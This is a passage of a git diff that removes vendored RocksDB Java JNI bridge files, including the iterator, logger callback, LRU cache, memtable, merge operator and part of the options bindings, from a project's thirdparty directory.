-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    seek0
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_RocksIterator_seek0(
-    JNIEnv* env, jobject jobj, jlong handle,
-    jbyteArray jtarget, jint jtarget_len) {
-  jbyte* target = env->GetByteArrayElements(jtarget, nullptr);
-  if(target == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  rocksdb::Slice target_slice(
-      reinterpret_cast<char*>(target), jtarget_len);
-
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  it->Seek(target_slice);
-
-  env->ReleaseByteArrayElements(jtarget, target, JNI_ABORT);
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    status0
- * Signature: (J)V
- */
-void Java_org_rocksdb_RocksIterator_status0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  rocksdb::Status s = it->status();
-
-  if (s.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    key0
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_RocksIterator_key0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  rocksdb::Slice key_slice = it->key();
-
-  jbyteArray jkey = env->NewByteArray(static_cast<jsize>(key_slice.size()));
-  if(jkey == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  env->SetByteArrayRegion(jkey, 0, static_cast<jsize>(key_slice.size()),
-                          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(key_slice.data())));
-  return jkey;
-}
-
-/*
- * Class:     org_rocksdb_RocksIterator
- * Method:    value0
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_RocksIterator_value0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::Iterator*>(handle);
-  rocksdb::Slice value_slice = it->value();
-
-  jbyteArray jkeyValue =
-      env->NewByteArray(static_cast<jsize>(value_slice.size()));
-  if(jkeyValue == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  env->SetByteArrayRegion(jkeyValue, 0, static_cast<jsize>(value_slice.size()),
-                          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(value_slice.data())));
-  return jkeyValue;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.cc b/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.cc
deleted file mode 100644
index 09140ed..0000000
--- a/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Logger.
-
-#include "include/org_rocksdb_Logger.h"
-
-#include "rocksjni/loggerjnicallback.h"
-#include "rocksjni/portal.h"
-#include <cstdarg>
-#include <cstdio>
-
-namespace rocksdb {
-
-LoggerJniCallback::LoggerJniCallback(
-    JNIEnv* env, jobject jlogger) {
-  // Note: Logger methods may be accessed by multiple threads,
-  // so we ref the jvm not the env
-  const jint rs = env->GetJavaVM(&m_jvm);
-  if(rs != JNI_OK) {
-    // exception thrown
-    return;
-  }
-
-  // Note: we want to access the Java Logger instance
-  // across multiple method calls, so we create a global ref
-  assert(jlogger != nullptr);
-  m_jLogger = env->NewGlobalRef(jlogger);
-  if(m_jLogger == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  m_jLogMethodId = LoggerJni::getLogMethodId(env);
-  if(m_jLogMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-
-  jobject jdebug_level = InfoLogLevelJni::DEBUG_LEVEL(env);
-  if(jdebug_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jdebug_level = env->NewGlobalRef(jdebug_level);
-  if(m_jdebug_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jinfo_level = InfoLogLevelJni::INFO_LEVEL(env);
-  if(jinfo_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jinfo_level = env->NewGlobalRef(jinfo_level);
-  if(m_jinfo_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jwarn_level = InfoLogLevelJni::WARN_LEVEL(env);
-  if(jwarn_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jwarn_level = env->NewGlobalRef(jwarn_level);
-  if(m_jwarn_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jerror_level = InfoLogLevelJni::ERROR_LEVEL(env);
-  if(jerror_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jerror_level = env->NewGlobalRef(jerror_level);
-  if(m_jerror_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jfatal_level = InfoLogLevelJni::FATAL_LEVEL(env);
-  if(jfatal_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jfatal_level = env->NewGlobalRef(jfatal_level);
-  if(m_jfatal_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  jobject jheader_level = InfoLogLevelJni::HEADER_LEVEL(env);
-  if(jheader_level == nullptr) {
-    // exception thrown: NoSuchFieldError, ExceptionInInitializerError
-    // or OutOfMemoryError
-    return;
-  }
-  m_jheader_level = env->NewGlobalRef(jheader_level);
-  if(m_jheader_level == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-}
-
-void LoggerJniCallback::Logv(const char* format, va_list ap) {
-  // We implement this method because it is virtual but we don't
-  // use it because we need to know about the log level.
-}
-
-void LoggerJniCallback::Logv(const InfoLogLevel log_level,
-    const char* format, va_list ap) {
-  if (GetInfoLogLevel() <= log_level) {
-
-    // determine InfoLogLevel java enum instance
-    jobject jlog_level;
-    switch (log_level) {
-      case rocksdb::InfoLogLevel::DEBUG_LEVEL:
-        jlog_level = m_jdebug_level;
-        break;
-      case rocksdb::InfoLogLevel::INFO_LEVEL:
-        jlog_level = m_jinfo_level;
-        break;
-      case rocksdb::InfoLogLevel::WARN_LEVEL:
-        jlog_level = m_jwarn_level;
-        break;
-      case rocksdb::InfoLogLevel::ERROR_LEVEL:
-        jlog_level = m_jerror_level;
-        break;
-      case rocksdb::InfoLogLevel::FATAL_LEVEL:
-        jlog_level = m_jfatal_level;
-        break;
-      case rocksdb::InfoLogLevel::HEADER_LEVEL:
-        jlog_level = m_jheader_level;
-        break;
-      default:
-        jlog_level = m_jfatal_level;
-        break;
-    }
-
-    assert(format != nullptr);
-    assert(ap != nullptr);
-    const std::unique_ptr<char[]> msg = format_str(format, ap);
-
-    // pass msg to java callback handler
-    jboolean attached_thread = JNI_FALSE;
-    JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-    assert(env != nullptr);
-
-    jstring jmsg = env->NewStringUTF(msg.get());
-    if(jmsg == nullptr) {
-      // unable to construct string
-      if(env->ExceptionCheck()) {
-        env->ExceptionDescribe(); // print out exception to stderr
-      }
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-    if(env->ExceptionCheck()) {
-      // exception thrown: OutOfMemoryError
-      env->ExceptionDescribe(); // print out exception to stderr
-      env->DeleteLocalRef(jmsg);
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-
-    env->CallVoidMethod(m_jLogger, m_jLogMethodId, jlog_level, jmsg);
-    if(env->ExceptionCheck()) {
-      // exception thrown
-      env->ExceptionDescribe(); // print out exception to stderr
-      env->DeleteLocalRef(jmsg);
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-
-    env->DeleteLocalRef(jmsg);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-  }
-}
-
-std::unique_ptr<char[]> LoggerJniCallback::format_str(const char* format, va_list ap) const {
-  va_list ap_copy;
-
-  va_copy(ap_copy, ap);
-  const size_t required = vsnprintf(nullptr, 0, format, ap_copy) + 1; // Extra space for '\0'
-  va_end(ap_copy);
-
-  std::unique_ptr<char[]> buf(new char[required]);
-
-  va_copy(ap_copy, ap);
-  vsnprintf(buf.get(), required, format, ap_copy);
-  va_end(ap_copy);
-
-  return buf;
-}
-
-LoggerJniCallback::~LoggerJniCallback() {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  if(m_jLogger != nullptr) {
-    env->DeleteGlobalRef(m_jLogger);
-  }
-
-  if(m_jdebug_level != nullptr) {
-    env->DeleteGlobalRef(m_jdebug_level);
-  }
-
-  if(m_jinfo_level != nullptr) {
-    env->DeleteGlobalRef(m_jinfo_level);
-  }
-
-  if(m_jwarn_level != nullptr) {
-    env->DeleteGlobalRef(m_jwarn_level);
-  }
-
-  if(m_jerror_level != nullptr) {
-    env->DeleteGlobalRef(m_jerror_level);
-  }
-
-  if(m_jfatal_level != nullptr) {
-    env->DeleteGlobalRef(m_jfatal_level);
-  }
-
-  if(m_jheader_level != nullptr) {
-    env->DeleteGlobalRef(m_jheader_level);
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-}  // namespace rocksdb
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    createNewLoggerOptions
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Logger_createNewLoggerOptions(
-    JNIEnv* env, jobject jobj, jlong joptions) {
-  auto* sptr_logger = new std::shared_ptr<rocksdb::LoggerJniCallback>(
-      new rocksdb::LoggerJniCallback(env, jobj));
-
-  // set log level
-  auto* options = reinterpret_cast<rocksdb::Options*>(joptions);
-  sptr_logger->get()->SetInfoLogLevel(options->info_log_level);
-
-  return reinterpret_cast<jlong>(sptr_logger);
-}
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    createNewLoggerDbOptions
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Logger_createNewLoggerDbOptions(
-    JNIEnv* env, jobject jobj, jlong jdb_options) {
-  auto* sptr_logger = new std::shared_ptr<rocksdb::LoggerJniCallback>(
-    new rocksdb::LoggerJniCallback(env, jobj));
-
-  // set log level
-  auto* db_options = reinterpret_cast<rocksdb::DBOptions*>(jdb_options);
-  sptr_logger->get()->SetInfoLogLevel(db_options->info_log_level);
-
-  return reinterpret_cast<jlong>(sptr_logger);
-}
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    setInfoLogLevel
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Logger_setInfoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jlog_level) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(jhandle);
-  handle->get()->
-      SetInfoLogLevel(static_cast<rocksdb::InfoLogLevel>(jlog_level));
-}
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    infoLogLevel
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Logger_infoLogLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(jhandle);
-  return static_cast<jbyte>(handle->get()->GetInfoLogLevel());
-}
-
-/*
- * Class:     org_rocksdb_Logger
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_Logger_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<rocksdb::LoggerJniCallback> *>(jhandle);
-  delete handle;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.h b/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.h
deleted file mode 100644
index 2db8597..0000000
--- a/thirdparty/rocksdb/java/rocksjni/loggerjnicallback.h
+++ /dev/null
@@ -1,50 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Logger
-
-#ifndef JAVA_ROCKSJNI_LOGGERJNICALLBACK_H_
-#define JAVA_ROCKSJNI_LOGGERJNICALLBACK_H_
-
-#include <jni.h>
-#include <memory>
-#include <string>
-#include "port/port.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-  class LoggerJniCallback : public Logger {
-   public:
-     LoggerJniCallback(JNIEnv* env, jobject jLogger);
-     virtual ~LoggerJniCallback();
-
-     using Logger::SetInfoLogLevel;
-     using Logger::GetInfoLogLevel;
-     // Write an entry to the log file with the specified format.
-     virtual void Logv(const char* format, va_list ap);
-     // Write an entry to the log file with the specified log level
-     // and format.  Any log with level under the internal log level
-     // of *this (see @SetInfoLogLevel and @GetInfoLogLevel) will not be
-     // printed.
-     virtual void Logv(const InfoLogLevel log_level,
-         const char* format, va_list ap);
-
-   private:
-     JavaVM* m_jvm;
-     jobject m_jLogger;
-     jmethodID m_jLogMethodId;
-     jobject m_jdebug_level;
-     jobject m_jinfo_level;
-     jobject m_jwarn_level;
-     jobject m_jerror_level;
-     jobject m_jfatal_level;
-     jobject m_jheader_level;
-     std::unique_ptr<char[]> format_str(const char* format, va_list ap) const;
-  };
-}  // namespace rocksdb
-
-#endif  // JAVA_ROCKSJNI_LOGGERJNICALLBACK_H_
diff --git a/thirdparty/rocksdb/java/rocksjni/lru_cache.cc b/thirdparty/rocksdb/java/rocksjni/lru_cache.cc
deleted file mode 100644
index 1658268..0000000
--- a/thirdparty/rocksdb/java/rocksjni/lru_cache.cc
+++ /dev/null
@@ -1,41 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::LRUCache.
-
-#include <jni.h>
-
-#include "cache/lru_cache.h"
-#include "include/org_rocksdb_LRUCache.h"
-
-/*
- * Class:     org_rocksdb_LRUCache
- * Method:    newLRUCache
- * Signature: (JIZD)J
- */
-jlong Java_org_rocksdb_LRUCache_newLRUCache(
-    JNIEnv* env, jclass jcls, jlong jcapacity, jint jnum_shard_bits,
-    jboolean jstrict_capacity_limit, jdouble jhigh_pri_pool_ratio) {
-  auto* sptr_lru_cache =
-      new std::shared_ptr<rocksdb::Cache>(rocksdb::NewLRUCache(
-          static_cast<size_t>(jcapacity),
-          static_cast<int>(jnum_shard_bits),
-          static_cast<bool>(jstrict_capacity_limit),
-          static_cast<double>(jhigh_pri_pool_ratio)));
-  return reinterpret_cast<jlong>(sptr_lru_cache);
-}
-
-/*
- * Class:     org_rocksdb_LRUCache
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_LRUCache_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* sptr_lru_cache =
-      reinterpret_cast<std::shared_ptr<rocksdb::Cache> *>(jhandle);
-  delete sptr_lru_cache;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/memtablejni.cc b/thirdparty/rocksdb/java/rocksjni/memtablejni.cc
deleted file mode 100644
index 56a04f9..0000000
--- a/thirdparty/rocksdb/java/rocksjni/memtablejni.cc
+++ /dev/null
@@ -1,90 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for MemTables.
-
-#include "rocksjni/portal.h"
-#include "include/org_rocksdb_HashSkipListMemTableConfig.h"
-#include "include/org_rocksdb_HashLinkedListMemTableConfig.h"
-#include "include/org_rocksdb_VectorMemTableConfig.h"
-#include "include/org_rocksdb_SkipListMemTableConfig.h"
-#include "rocksdb/memtablerep.h"
-
-/*
- * Class:     org_rocksdb_HashSkipListMemTableConfig
- * Method:    newMemTableFactoryHandle
- * Signature: (JII)J
- */
-jlong Java_org_rocksdb_HashSkipListMemTableConfig_newMemTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jlong jbucket_count,
-    jint jheight, jint jbranching_factor) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jbucket_count);
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(rocksdb::NewHashSkipListRepFactory(
-        static_cast<size_t>(jbucket_count),
-        static_cast<int32_t>(jheight),
-        static_cast<int32_t>(jbranching_factor)));
-  }
-  rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_HashLinkedListMemTableConfig
- * Method:    newMemTableFactoryHandle
- * Signature: (JJIZI)J
- */
-jlong Java_org_rocksdb_HashLinkedListMemTableConfig_newMemTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jlong jbucket_count, jlong jhuge_page_tlb_size,
-    jint jbucket_entries_logging_threshold,
-    jboolean jif_log_bucket_dist_when_flash, jint jthreshold_use_skiplist) {
-  rocksdb::Status statusBucketCount =
-      rocksdb::check_if_jlong_fits_size_t(jbucket_count);
-  rocksdb::Status statusHugePageTlb =
-      rocksdb::check_if_jlong_fits_size_t(jhuge_page_tlb_size);
-  if (statusBucketCount.ok() && statusHugePageTlb.ok()) {
-    return reinterpret_cast<jlong>(rocksdb::NewHashLinkListRepFactory(
-        static_cast<size_t>(jbucket_count),
-        static_cast<size_t>(jhuge_page_tlb_size),
-        static_cast<int32_t>(jbucket_entries_logging_threshold),
-        static_cast<bool>(jif_log_bucket_dist_when_flash),
-        static_cast<int32_t>(jthreshold_use_skiplist)));
-  }
-  rocksdb::IllegalArgumentExceptionJni::ThrowNew(env,
-      !statusBucketCount.ok()?statusBucketCount:statusHugePageTlb);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_VectorMemTableConfig
- * Method:    newMemTableFactoryHandle
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_VectorMemTableConfig_newMemTableFactoryHandle(
-    JNIEnv* env, jobject jobj, jlong jreserved_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jreserved_size);
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(new rocksdb::VectorRepFactory(
-        static_cast<size_t>(jreserved_size)));
-  }
-  rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_SkipListMemTableConfig
- * Method:    newMemTableFactoryHandle0
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_SkipListMemTableConfig_newMemTableFactoryHandle0(
-    JNIEnv* env, jobject jobj, jlong jlookahead) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jlookahead);
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(new rocksdb::SkipListFactory(
-        static_cast<size_t>(jlookahead)));
-  }
-  rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  return 0;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/merge_operator.cc b/thirdparty/rocksdb/java/rocksjni/merge_operator.cc
deleted file mode 100644
index 1b94382..0000000
--- a/thirdparty/rocksdb/java/rocksjni/merge_operator.cc
+++ /dev/null
@@ -1,48 +0,0 @@
-// Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com).  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++
-// for rocksdb::MergeOperator.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-#include <memory>
-
-#include "include/org_rocksdb_StringAppendOperator.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-/*
- * Class:     org_rocksdb_StringAppendOperator
- * Method:    newSharedStringAppendOperator
- * Signature: ()J
- */
-jlong Java_org_rocksdb_StringAppendOperator_newSharedStringAppendOperator
-(JNIEnv* env, jclass jclazz) {
-  auto* sptr_string_append_op = new std::shared_ptr<rocksdb::MergeOperator>(
-    rocksdb::MergeOperators::CreateFromStringId("stringappend"));
-  return reinterpret_cast<jlong>(sptr_string_append_op);
-}
-
-/*
- * Class:     org_rocksdb_StringAppendOperator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_StringAppendOperator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* sptr_string_append_op =
-      reinterpret_cast<std::shared_ptr<rocksdb::MergeOperator>* >(jhandle);
-  delete sptr_string_append_op;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/options.cc b/thirdparty/rocksdb/java/rocksjni/options.cc
deleted file mode 100644
index 8194aba..0000000
--- a/thirdparty/rocksdb/java/rocksjni/options.cc
+++ /dev/null
@@ -1,6101 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for rocksdb::Options.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <memory>
-#include <vector>
-
-#include "include/org_rocksdb_Options.h"
-#include "include/org_rocksdb_DBOptions.h"
-#include "include/org_rocksdb_ColumnFamilyOptions.h"
-#include "include/org_rocksdb_WriteOptions.h"
-#include "include/org_rocksdb_ReadOptions.h"
-#include "include/org_rocksdb_ComparatorOptions.h"
-#include "include/org_rocksdb_FlushOptions.h"
-
-#include "rocksjni/comparatorjnicallback.h"
-#include "rocksjni/portal.h"
-#include "rocksjni/statisticsjni.h"
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    newOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_Options_newOptions__(JNIEnv* env, jclass jcls) {
-  auto* op = new rocksdb::Options();
-  return reinterpret_cast<jlong>(op);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    newOptions
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_Options_newOptions__JJ(JNIEnv* env, jclass jcls,
-    jlong jdboptions, jlong jcfoptions) {
-  auto* dbOpt = reinterpret_cast<const rocksdb::DBOptions*>(jdboptions);
-  auto* cfOpt = reinterpret_cast<const rocksdb::ColumnFamilyOptions*>(
-      jcfoptions);
-  auto* op = new rocksdb::Options(*dbOpt, *cfOpt);
-  return reinterpret_cast<jlong>(op);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_Options_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* op = reinterpret_cast<rocksdb::Options*>(handle);
-  assert(op != nullptr);
-  delete op;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setIncreaseParallelism
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setIncreaseParallelism(
-    JNIEnv * env, jobject jobj, jlong jhandle, jint totalThreads) {
-  reinterpret_cast<rocksdb::Options*>
-      (jhandle)->IncreaseParallelism(static_cast<int>(totalThreads));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCreateIfMissing
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setCreateIfMissing(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->create_if_missing = flag;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    createIfMissing
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_createIfMissing(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->create_if_missing;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setCreateMissingColumnFamilies
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_Options_setCreateMissingColumnFamilies(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean flag) {
-  reinterpret_cast<rocksdb::Options*>
-      (jhandle)->create_missing_column_families = flag;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    createMissingColumnFamilies
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_Options_createMissingColumnFamilies(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>
-      (jhandle)->create_missing_column_families;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setComparatorHandle
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setComparatorHandle__JI(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint builtinComparator) {
-  switch (builtinComparator) {
-    case 1:
-      reinterpret_cast<rocksdb::Options*>(jhandle)->comparator =
-          rocksdb::ReverseBytewiseComparator();
-      break;
-    default:
-      reinterpret_cast<rocksdb::Options*>(jhandle)->comparator =
-          rocksdb::BytewiseComparator();
-      break;
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setComparatorHandle
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setComparatorHandle__JJ(
-    JNIEnv* env, jobject jobj, jlong jopt_handle, jlong jcomparator_handle) {
-  reinterpret_cast<rocksdb::Options*>(jopt_handle)->comparator =
-      reinterpret_cast<rocksdb::Comparator*>(jcomparator_handle);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMergeOperatorName
- * Signature: (JJjava/lang/String)V
- */
-void Java_org_rocksdb_Options_setMergeOperatorName(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jop_name) {
-  const char* op_name = env->GetStringUTFChars(jop_name, nullptr);
-  if(op_name == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  auto* options = reinterpret_cast<rocksdb::Options*>(jhandle);
-  options->merge_operator = rocksdb::MergeOperators::CreateFromStringId(
-        op_name);
-
-  env->ReleaseStringUTFChars(jop_name, op_name);
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMergeOperator
- * Signature: (JJjava/lang/String)V
- */
-void Java_org_rocksdb_Options_setMergeOperator(
-  JNIEnv* env, jobject jobj, jlong jhandle, jlong mergeOperatorHandle) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->merge_operator =
-    *(reinterpret_cast<std::shared_ptr<rocksdb::MergeOperator>*>
-      (mergeOperatorHandle));
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setWriteBufferSize
- * Signature: (JJ)I
- */
-void Java_org_rocksdb_Options_setWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jwrite_buffer_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jwrite_buffer_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::Options*>(jhandle)->write_buffer_size =
-        jwrite_buffer_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    writeBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_writeBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::Options*>(jhandle)->write_buffer_size;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setMaxWriteBufferNumber
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Options_setMaxWriteBufferNumber(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_write_buffer_number) {
-  reinterpret_cast<rocksdb::Options*>(jhandle)->max_write_buffer_number =
-          jmax_write_buffer_number;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    setStatistics
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Options_setStatistics(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jstatistics_handle) {
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jhandle);
-  auto* pSptr =
-      reinterpret_cast<std::shared_ptr<rocksdb::StatisticsJni>*>(
-          jstatistics_handle);
-  opt->statistics = *pSptr;
-}
-
-/*
- * Class:     org_rocksdb_Options
- * Method:    statistics
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Options_statistics(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
